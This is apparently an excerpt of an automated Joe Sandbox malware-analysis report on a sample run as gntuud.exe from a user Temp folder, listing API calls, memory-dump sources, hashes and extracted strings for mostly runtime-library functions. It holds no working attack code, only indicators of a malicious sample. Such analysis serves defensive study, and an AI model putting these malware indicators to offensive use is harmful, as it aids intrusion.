                                                                • _free.LIBCMT ref: 00422546
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
                                                                • Instruction ID: 58f4e587e69a32dac6c23b689706d054278821061d6879d412644195358b7cbe
                                                                • Opcode Fuzzy Hash: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
                                                                • Instruction Fuzzy Hash: 7911B431A40B18FAD920BFB2DD47FCBB7DC5F08304FC0481EB699A6052D6ACB5514648
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetConsoleCP.KERNEL32(?,00955B07,00000000), ref: 00973DD7
                                                                • __fassign.LIBCMT ref: 00973FB6
                                                                • __fassign.LIBCMT ref: 00973FD3
                                                                • WriteFile.KERNEL32(?,00955B07,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0097401B
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0097405B
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00974107
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                • String ID:
                                                                • API String ID: 4031098158-0
                                                                • Opcode ID: 7d55223bb09163640f0d9bf16a928e29f032f295346b8fdeb5be4f5065d50545
                                                                • Instruction ID: 41401f38a3501940db52807d9993199ff0567a55d09a36b2996e692323fe2fd5
                                                                • Opcode Fuzzy Hash: 7d55223bb09163640f0d9bf16a928e29f032f295346b8fdeb5be4f5065d50545
                                                                • Instruction Fuzzy Hash: 99D1AF72D002589FCF15CFA8C8809EDBBB5BF48314F24816AE959F7242D731AE46CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetConsoleCP.KERNEL32(?,004058A0,00000000), ref: 00423B70
                                                                • __fassign.LIBCMT ref: 00423D4F
                                                                • __fassign.LIBCMT ref: 00423D6C
                                                                • WriteFile.KERNEL32(?,004058A0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423DB4
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00423DF4
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423EA0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                • String ID:
                                                                • API String ID: 4031098158-0
                                                                • Opcode ID: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
                                                                • Instruction ID: a467c14f7ebf387d8f292150a90acf63a4f3dd59af87892f088fdbcdb0a48f83
                                                                • Opcode Fuzzy Hash: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
                                                                • Instruction Fuzzy Hash: 72D19F71E002689FCF15CFA8D8809EDBBB5BF49314F64016AE855B7342D738AE46CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00969B2E,0096971E,00968F63), ref: 00969B45
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00969B53
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00969B6C
                                                                • SetLastError.KERNEL32(00000000,00969B2E,0096971E,00968F63), ref: 00969BBE
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
                                                                • Instruction ID: 0cec0abca7ae3d6829993ac75bf83a065821c4b1375d5a511e416b83cc63e8ea
                                                                • Opcode Fuzzy Hash: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
                                                                • Instruction Fuzzy Hash: F80126736097115EE72C27B5BD85B2A2BBCEB45772730033AF511940F5EFA54C01EA48
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,004198C7,004194B7,00418CFC), ref: 004198DE
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004198EC
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00419905
                                                                • SetLastError.KERNEL32(00000000,004198C7,004194B7,00418CFC), ref: 00419957
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
                                                                • Instruction ID: dfdc178befc3424474c629a448357edf8bf4b92ab251d18c35ab581d65446efd
                                                                • Opcode Fuzzy Hash: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
                                                                • Instruction Fuzzy Hash: 7101F5726193115EE6282676BD959E72774EB05778320023FF210852E0EB590C85D58D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe, xrefs: 009712CA
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                                • API String ID: 0-628885649
                                                                • Opcode ID: bfd5d46c515e17014f1bd1f1bc140eecf9bc539adaec1f5199e9c11f98db3bd1
                                                                • Instruction ID: fa9c1c174a8810c45dd339dc86fbf0b4bf0685594a4dd6b4f631d307b36f47c7
                                                                • Opcode Fuzzy Hash: bfd5d46c515e17014f1bd1f1bc140eecf9bc539adaec1f5199e9c11f98db3bd1
                                                                • Instruction Fuzzy Hash: A921F3B2600209AFDB20AFA98C81E3B77ADEF80365710C625F968D7551E734EC0087B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe, xrefs: 00421063
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                                • API String ID: 0-628885649
                                                                • Opcode ID: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
                                                                • Instruction ID: d9f0d1edbe79c721972c5de009bde6595bd14974265b531d28add2f36aac6c1f
                                                                • Opcode Fuzzy Hash: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
                                                                • Instruction Fuzzy Hash: 1021F871700125AFDB20AF62ACC186B776CEF14368790452BF91593261DB38EC9187A8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcsrchr
                                                                • String ID: .bat$.cmd$.com$.exe
                                                                • API String ID: 1752292252-4019086052
                                                                • Opcode ID: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
                                                                • Instruction ID: 010fe26d956af5bd087513acdd8c981cfa3e4b5d319970c9fb4408be828d902b
                                                                • Opcode Fuzzy Hash: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
                                                                • Instruction Fuzzy Hash: 0D01E537684636352614211AAC427B717A99BDABB4B25012FFC44F72C1FE8CEC8251DC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-
                                                                • API String ID: 0-2084034818
                                                                • Opcode ID: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
                                                                • Instruction ID: cadd73a2a830a1b03fc792233cfe60f62a5f785435c8c8d28cbd2197b084f308
                                                                • Opcode Fuzzy Hash: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
                                                                • Instruction Fuzzy Hash: A311DA71B12221EBC7324B249D44AAB77649F017E4B510533EE05A7391D738DDE1C6DE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA38
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA4B
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA6E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
                                                                • Instruction ID: ed62b177b772f88879a3613f9265b3cbba58386cad372b2ef282e3211ef706bb
                                                                • Opcode Fuzzy Hash: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
                                                                • Instruction Fuzzy Hash: A9F08C30601218FBDB259B50ED0ABEE7AB8EF04795F900171A900A11A0CB788E45DA98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 597776487-0
                                                                • Opcode ID: 2a9720468bc7374e63b1a8a2eb236f89a39f1711814bb6c400c934648fa5f8cd
                                                                • Instruction ID: f4105a9d2bf4c62ba60f74444556619fbb2536358b6bfd8ea063c28be5118abe
                                                                • Opcode Fuzzy Hash: 2a9720468bc7374e63b1a8a2eb236f89a39f1711814bb6c400c934648fa5f8cd
                                                                • Instruction Fuzzy Hash: 6CC12873A00644AFDB209F78DC51BAE7BADEF85350F25806AE45C97292E7B09D01C790
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 597776487-0
                                                                • Opcode ID: 9705e53f86fe525c8fa182946632fa87d129716aca97e2ec1b28991990dea419
                                                                • Instruction ID: 0a3dac8c0d2f4ab523d7b0c170e7acef0f0f927e43a4501e6aab2b421f423aab
                                                                • Opcode Fuzzy Hash: 9705e53f86fe525c8fa182946632fa87d129716aca97e2ec1b28991990dea419
                                                                • Instruction Fuzzy Hash: ECC14571B002649FDB20AF69E841BAB7BA8EF95354F9501AFE540D7381E7388D41CB9C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0096C387), ref: 0096C477
                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 0096C4D1
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0096C387,?,000000FF,00000000,00000000), ref: 0096C55F
                                                                • __dosmaperr.LIBCMT ref: 0096C566
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0096C5A3
                                                                  • Part of subcall function 0096C7CB: __dosmaperr.LIBCMT ref: 0096C800
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                • String ID:
                                                                • API String ID: 1206951868-0
                                                                • Opcode ID: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
                                                                • Instruction ID: a02467e3bed93ec9775dd592816184436ed4c334d198562484dd90faa4a83494
                                                                • Opcode Fuzzy Hash: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
                                                                • Instruction Fuzzy Hash: 8F414DB6904204ABCB24DFA5DC459BFBBF9EF88700B40492EF496D3611EB34A805CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0041C120), ref: 0041C210
                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041C26A
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0041C120,?,000000FF,00000000,00000000), ref: 0041C2F8
                                                                • __dosmaperr.LIBCMT ref: 0041C2FF
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0041C33C
                                                                  • Part of subcall function 0041C564: __dosmaperr.LIBCMT ref: 0041C599
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                • String ID:
                                                                • API String ID: 1206951868-0
                                                                • Opcode ID: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
                                                                • Instruction ID: 4e69e7e4d88eedad6c45f19224540fe4c6ef1bb07ae0a9dc76835222067d53ae
                                                                • Opcode Fuzzy Hash: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
                                                                • Instruction Fuzzy Hash: F1414F76940248ABCB24DFA5DC859EFBBF9EF89300704852EF856D3610D7389885CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 0097264B
                                                                  • Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
                                                                  • Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910
                                                                • _free.LIBCMT ref: 0097265D
                                                                • _free.LIBCMT ref: 0097266F
                                                                • _free.LIBCMT ref: 00972681
                                                                • _free.LIBCMT ref: 00972693
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
                                                                • Instruction ID: 585213a20c6ff2915f2549d9aac4ae3735afdf13736388ea236bfb93871f244c
                                                                • Opcode Fuzzy Hash: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
                                                                • Instruction Fuzzy Hash: 1AF01D77515204ABD620EB68F8C6D5E73DDEB407107A8582BF448D7540CB74FC808AA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 004223E4
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 004223F6
                                                                • _free.LIBCMT ref: 00422408
                                                                • _free.LIBCMT ref: 0042241A
                                                                • _free.LIBCMT ref: 0042242C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
                                                                • Instruction ID: 06c163a86ce9bcf53bddb1e809bffc1f14a8d71068ad18bce2e552751ae1d238
                                                                • Opcode Fuzzy Hash: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
                                                                • Instruction Fuzzy Hash: B5F04F32A41210BB8620EB66FAC2C4B73D9AA203117E5590AF804D7641CBBCFCC28A5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: *?
                                                                • API String ID: 269201875-2564092906
                                                                • Opcode ID: 45449b687c87599775de4a1805f132593c5a0402670b986f45e94783a92b91ae
                                                                • Instruction ID: 359a35c90810bd3a90b43baebdb3e6db0ea5b5589b08963a60a4344abb653899
                                                                • Opcode Fuzzy Hash: 45449b687c87599775de4a1805f132593c5a0402670b986f45e94783a92b91ae
                                                                • Instruction Fuzzy Hash: 74612FB6D00219DFDF14DFA8C8815EDFBF9EF88310B14856AE859E7340D675AE418B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: *?
                                                                • API String ID: 269201875-2564092906
                                                                • Opcode ID: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
                                                                • Instruction ID: a63c59b0d7da49b05f07040cb4a194fc74b471ca4969d8fc6594f89651597fee
                                                                • Opcode Fuzzy Hash: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
                                                                • Instruction Fuzzy Hash: 376160B5E002299FCB24CF99D8815EEFBF5EF48314B64416AE815F7301D739AE418B94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0096A249
                                                                • CatchIt.LIBVCRUNTIME ref: 0096A32F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchEncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 1435073870-2084237596
                                                                • Opcode ID: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
                                                                • Instruction ID: 76123484212741b6dc7229a54dbe25bc6cbd4e9d61cac85b84e87bce4c517f07
                                                                • Opcode Fuzzy Hash: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
                                                                • Instruction Fuzzy Hash: F5412572900209EFCF15DF98CD81AAEBBB9EF48304F188159F914B6221D2369960DF52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00419FE2
                                                                • CatchIt.LIBVCRUNTIME ref: 0041A0C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchEncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 1435073870-2084237596
                                                                • Opcode ID: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
                                                                • Instruction ID: b55e6041155ecd8fb66803e6bd24d0423a012c2324726995748e47be6f979120
                                                                • Opcode Fuzzy Hash: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
                                                                • Instruction Fuzzy Hash: 3C416C72A00209EFCF15DF94CD81AEEBBB5FF48304F18805AF90467251D33999A0DB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
                                                                • Instruction ID: a1e6f20e7a3f2c83d62c225fbae161fba4dd5eea7768ac025d6d1887aa8d2a73
                                                                • Opcode Fuzzy Hash: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
                                                                • Instruction Fuzzy Hash: 8C51BEB2604206AFDB298F14D951BBAB7ACFF40710F24452DF9459B2E0E735AD40DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
                                                                • Instruction ID: d148374ac9c33eb5af7e197456be07967fb5ffa3c7fa52c118e22ba4f2cbab34
                                                                • Opcode Fuzzy Hash: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
                                                                • Instruction Fuzzy Hash: C2510072A05286AFDB288F55D861BEB73A4FF00354F28402FE80647291E739EDC5C799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,?,00439008,00000000), ref: 00955750
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009557B7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 009557BE
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
                                                                • String ID:
                                                                • API String ID: 3310240892-0
                                                                • Opcode ID: bfbb64b6e6a5d3c649838db63052e99c305c58f95061fe673e4fd75229548b3a
                                                                • Instruction ID: 6fc464683a2c80726bb9df5469d4d93a92649820a2ee5c594c1ef69922f7d8f5
                                                                • Opcode Fuzzy Hash: bfbb64b6e6a5d3c649838db63052e99c305c58f95061fe673e4fd75229548b3a
                                                                • Instruction Fuzzy Hash: 59516870E00608DBDB24EB25CD59BDDBB74EF45311F9042A8ED04A72D2EB349E888F91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,?,2F6E538A,00000000), ref: 004054E9
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405550
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405557
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
